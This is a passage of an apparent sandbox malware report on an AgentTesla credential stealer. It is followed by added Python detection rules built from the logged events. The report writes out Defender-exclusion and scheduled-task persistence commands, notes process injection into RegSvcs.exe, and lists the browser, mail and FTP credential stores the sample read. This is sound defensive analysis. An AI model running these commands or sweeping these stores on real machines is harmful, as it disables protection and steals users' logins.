                      Source: RegSvcs.exe, 00000006.00000002.929777054.0000000005B17000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000003.875278823.0000000005B58000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
                      Source: winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmp | Binary or memory string: vmware
                      Source: winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\winlogon.exe | Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00E50040 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\winlogon.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\winlogon.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe
                      Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe
                      Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe
                      Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp
                      Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: RegSvcs.exe, 00000006.00000002.928991406.0000000001300000.00000002.00020000.sdmp | Binary or memory string: Program Manager
                      Source: RegSvcs.exe, 00000006.00000002.928991406.0000000001300000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: RegSvcs.exe, 00000006.00000002.928991406.0000000001300000.00000002.00020000.sdmp | Binary or memory string: Progman
                      Source: RegSvcs.exe, 00000006.00000002.928991406.0000000001300000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\winlogon.exe | Queries volume information: C:\Users\user\Desktop\winlogon.exe VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_05DF5FDC GetUserNameW,
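The three process creations in this section (PowerShell adding a Defender exclusion under the user's AppData, schtasks importing a task from the user's Temp folder, and RegSvcs.exe launched with no arguments so that winlogon.exe can write the payload into it) are the events the Sigma rules named in the summary key on. The Python below is an added example and not part of the Joe Sandbox report: it encodes those three checks as rule functions and runs them over process-creation events constructed from the command lines on this page, plus two benign controls that must stay silent. The event fields, rule names, the set of sacrificial .NET utilities and the notion of "user-writable" are assumptions chosen for illustration.

```python
"""Process-creation checks for the evasion and persistence chain in this report.

Added example, not part of the Joe Sandbox report. Events are constructed from
the command lines shown above; field names and rule names are assumptions.
"""
import re
from dataclasses import dataclass

# Assumption: anything under a user's AppData tree counts as user-writable.
USER_APPDATA = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)
USER_TEMP = re.compile(r"\\appdata\\local\\temp\\", re.I)
# .NET utilities commonly hollowed as sacrificial hosts; RegSvcs.exe is the one seen here.
SACRIFICIAL = {"regsvcs.exe", "regasm.exe"}


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def tokens(cmd):
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_defender_exclusion(ev):
    """PowerShell adding a Defender exclusion that points into a user profile."""
    if basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return False
    low = [t.lower() for t in tokens(ev.command_line)]
    if "add-mppreference" not in low:
        return False
    return any(t.startswith("-exclusion") and USER_APPDATA.search(nxt)
               for t, nxt in zip(low, low[1:]))


def rule_task_from_temp(ev):
    """schtasks /Create importing its task definition from the user's Temp folder."""
    if basename(ev.image) != "schtasks.exe":
        return False
    toks = tokens(ev.command_line)
    low = [t.lower() for t in toks]
    if "/create" not in low or "/xml" not in low:
        return False
    i = low.index("/xml")
    return i + 1 < len(toks) and USER_TEMP.search(toks[i + 1]) is not None


def rule_sacrificial_process(ev):
    """A .NET utility started with no arguments at all: it has nothing to do
    unless another process is about to write code into it."""
    return basename(ev.image) in SACRIFICIAL and len(tokens(ev.command_line)) == 1


RULES = {
    "powershell_defender_exclusion_in_appdata": rule_defender_exclusion,
    "schtasks_xml_from_user_temp": rule_task_from_temp,
    "sacrificial_dotnet_utility_without_args": rule_sacrificial_process,
}


def scan(events):
    """Return (rule name, image basename) for every event that trips a rule."""
    return [(name, basename(ev.image))
            for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed sample: the three command lines from this report, then two benign controls.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\winlogon.exe",
              r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe"'),
    ProcEvent(r"C:\Users\user\Desktop\winlogon.exe",
              r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" '
              r'/XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp"'),
    ProcEvent(r"C:\Users\user\Desktop\winlogon.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe Add-MpPreference -ExclusionPath "D:\SQLData"'),
    ProcEvent(r"C:\Program Files\Vendor\setup.exe",
              r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /Create /TN "Vendor\Update" /XML "C:\Program Files\Vendor\update.xml"'),
]

if __name__ == "__main__":
    for name, image in scan(SAMPLE_EVENTS):
        print(f"{name}: {image}")
```

The exclusion rule keys on where the exclusion points rather than on Add-MpPreference alone, because administrators do add exclusions; a path inside a user profile is what separates this sample's command from routine use. The sacrificial-process rule is deliberately blunt: RegSvcs.exe with no assembly argument only prints usage and exits, so an argument-less launch that then stays alive is the injection itself.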

                      Stealing of Sensitive Information:

                      Yara detected AgentTesla
                      Source: Yara match | File source: 6.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.winlogon.exe.3cf9f30.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.winlogon.exe.3cc4110.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.winlogon.exe.3cf9f30.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.winlogon.exe.3cc4110.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.928192822.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000000.672598413.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000000.672988393.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000000.673339643.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.929157483.00000000029B4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: winlogon.exe PID: 6768, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6284, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara match | File source: 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6284, type: MEMORYSTR
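The file and registry opens under the four harvesting signatures above are one process, the hollowed RegSvcs.exe, sweeping every credential store it knows about: Thunderbird and Firefox profiles.ini, Chrome's Login Data, FileZilla's recentservers.xml, SmartFTP favourites, and the WinSCP, IncrediMail and Outlook profile keys. None of those belong to RegSvcs.exe. The Python below is an added example and not part of the Joe Sandbox report: it pairs each store location from this page with the application that legitimately reads it, then counts per process how many distinct stores a non-owner touched, over access events constructed from the opens listed above plus two legitimate owner reads. The owner executable names, the event fields and the sweep threshold are assumptions for illustration.

```python
"""Credential-store access checks for the harvesting seen in this report.

Added example, not part of the Joe Sandbox report. Store locations come from
the file and registry opens above; owner executable names are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessEvent:
    image: str   # full path of the process performing the access
    kind: str    # "file" or "registry"
    target: str  # path or key as logged


# (kind, pattern over the lower-cased target, executables that legitimately read it)
CREDENTIAL_STORES = [
    ("file", r"\\appdata\\roaming\\thunderbird\\profiles\.ini$", {"thunderbird.exe"}),
    ("file", r"\\appdata\\roaming\\mozilla\\firefox\\profiles\.ini$", {"firefox.exe"}),
    ("file", r"\\appdata\\local\\google\\chrome\\user data\\[^\\]+\\login data$", {"chrome.exe"}),
    ("file", r"\\appdata\\roaming\\filezilla\\recentservers\.xml$", {"filezilla.exe"}),
    ("file", r"\\appdata\\roaming\\smartftp\\", {"smartftp.exe"}),
    ("registry", r"\\software\\martin prikryl\\winscp 2\\sessions", {"winscp.exe"}),
    ("registry", r"\\software\\incredimail\\identities", {"incmail.exe"}),
    ("registry", r"\\windows messaging subsystem\\profiles\\", {"outlook.exe"}),
]
COMPILED = [(kind, re.compile(pat, re.I), owners) for kind, pat, owners in CREDENTIAL_STORES]

# Assumption: one process reading this many distinct stores is a sweep, not a coincidence.
SWEEP_THRESHOLD = 3


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the store pattern when a non-owner process touches a credential store, else None."""
    target = ev.target.lower()
    for kind, pat, owners in COMPILED:
        if kind == ev.kind and pat.search(target):
            return None if basename(ev.image) in owners else pat.pattern
    return None


def stores_per_process(events):
    """Map each offending process name to the set of distinct stores it touched."""
    hits = {}
    for ev in events:
        store = classify(ev)
        if store:
            hits.setdefault(basename(ev.image), set()).add(store)
    return hits


def sweeps(events):
    """Process names that crossed the sweep threshold, with their store counts."""
    return {img: len(s) for img, s in stores_per_process(events).items()
            if len(s) >= SWEEP_THRESHOLD}


# Constructed sample: the opens from this report, then the owning apps reading their own data.
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
SAMPLE_EVENTS = [
    AccessEvent(REGSVCS, "file", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    AccessEvent(REGSVCS, "registry", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion"
                r"\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"),
    AccessEvent(REGSVCS, "registry", r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    AccessEvent(REGSVCS, "file", r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"),
    AccessEvent(REGSVCS, "file", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    AccessEvent(REGSVCS, "file", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    AccessEvent(r"C:\Program Files\Mozilla Firefox\firefox.exe", "file",
                r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    AccessEvent(r"C:\Program Files (x86)\WinSCP\WinSCP.exe", "registry",
                r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
]

if __name__ == "__main__":
    for image, count in sweeps(SAMPLE_EVENTS).items():
        print(f"{image} read {count} distinct credential stores")
```

Counting distinct stores per process, rather than alerting on each open, is what keeps this usable: a backup agent or a profile-migration tool may legitimately read one or two of these files, but a single .NET utility opening mail, browser, FTP and SCP stores in one run is the stealer's signature regardless of which family it is.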

                      Remote Access Functionality:

                      Yara detected AgentTesla
                      Source: Yara match | File source: 6.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
